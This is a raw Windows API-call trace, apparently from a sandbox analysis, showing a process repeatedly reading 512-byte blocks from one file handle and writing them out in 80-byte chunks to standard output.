[0144.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.175] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] GetFileType (hFile=0x50) returned 0x1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] GetFileType (hFile=0x50) returned 0x1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] GetFileType (hFile=0x50) returned 0x1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] GetFileType (hFile=0x50) returned 0x1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] GetFileType (hFile=0x50) returned 0x1 [0144.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.176] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.176] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.176] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.176] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.176] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] GetFileType (hFile=0x50) returned 0x1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] GetFileType (hFile=0x50) returned 0x1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] GetFileType (hFile=0x50) returned 0x1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] GetFileType (hFile=0x50) returned 0x1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] GetFileType (hFile=0x50) returned 0x1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] GetFileType (hFile=0x50) returned 0x1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] GetFileType (hFile=0x50) returned 0x1 [0144.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.177] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] GetFileType (hFile=0x50) returned 0x1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.178] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.178] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.178] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.178] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] GetFileType (hFile=0x50) returned 0x1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] GetFileType (hFile=0x50) returned 0x1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] GetFileType (hFile=0x50) returned 0x1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] GetFileType (hFile=0x50) returned 0x1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] GetFileType (hFile=0x50) returned 0x1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.178] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] GetFileType (hFile=0x50) returned 0x1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] GetFileType (hFile=0x50) returned 0x1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] GetFileType (hFile=0x50) returned 0x1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.179] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.179] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.179] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.179] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] GetFileType (hFile=0x50) returned 0x1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] GetFileType (hFile=0x50) returned 0x1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] GetFileType (hFile=0x50) returned 0x1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.179] GetFileType (hFile=0x50) returned 0x1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] GetFileType (hFile=0x50) returned 0x1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] GetFileType (hFile=0x50) returned 0x1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] GetFileType (hFile=0x50) returned 0x1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] GetFileType (hFile=0x50) returned 0x1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.180] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.180] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.180] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.180] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.180] GetFileType (hFile=0x50) returned 0x1 [0144.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] GetFileType (hFile=0x50) returned 0x1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] GetFileType (hFile=0x50) returned 0x1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] GetFileType (hFile=0x50) returned 0x1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] GetFileType (hFile=0x50) returned 0x1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] GetFileType (hFile=0x50) returned 0x1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] GetFileType (hFile=0x50) returned 0x1 [0144.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.181] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] GetFileType (hFile=0x50) returned 0x1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.182] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.182] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.182] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.182] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] GetFileType (hFile=0x50) returned 0x1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] GetFileType (hFile=0x50) returned 0x1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] GetFileType (hFile=0x50) returned 0x1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] GetFileType (hFile=0x50) returned 0x1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] GetFileType (hFile=0x50) returned 0x1 [0144.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.182] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] GetFileType (hFile=0x50) returned 0x1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] GetFileType (hFile=0x50) returned 0x1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] GetFileType (hFile=0x50) returned 0x1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.183] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.183] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.183] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.183] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] GetFileType (hFile=0x50) returned 0x1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] GetFileType (hFile=0x50) returned 0x1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] GetFileType (hFile=0x50) returned 0x1 [0144.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.183] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.184] GetFileType (hFile=0x50) returned 0x1 [0144.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.184] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.184] GetFileType (hFile=0x50) returned 0x1 [0144.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.184] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.184] GetFileType (hFile=0x50) returned 0x1 [0144.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.184] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.184] GetFileType (hFile=0x50) returned 0x1 [0144.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.231] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.231] GetFileType (hFile=0x50) returned 0x1 [0144.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.231] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.231] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.231] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.231] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.231] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.231] GetFileType (hFile=0x50) returned 0x1 [0144.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] GetFileType (hFile=0x50) returned 0x1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] GetFileType (hFile=0x50) returned 0x1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] GetFileType (hFile=0x50) returned 0x1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] GetFileType (hFile=0x50) returned 0x1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.232] GetFileType (hFile=0x50) returned 0x1 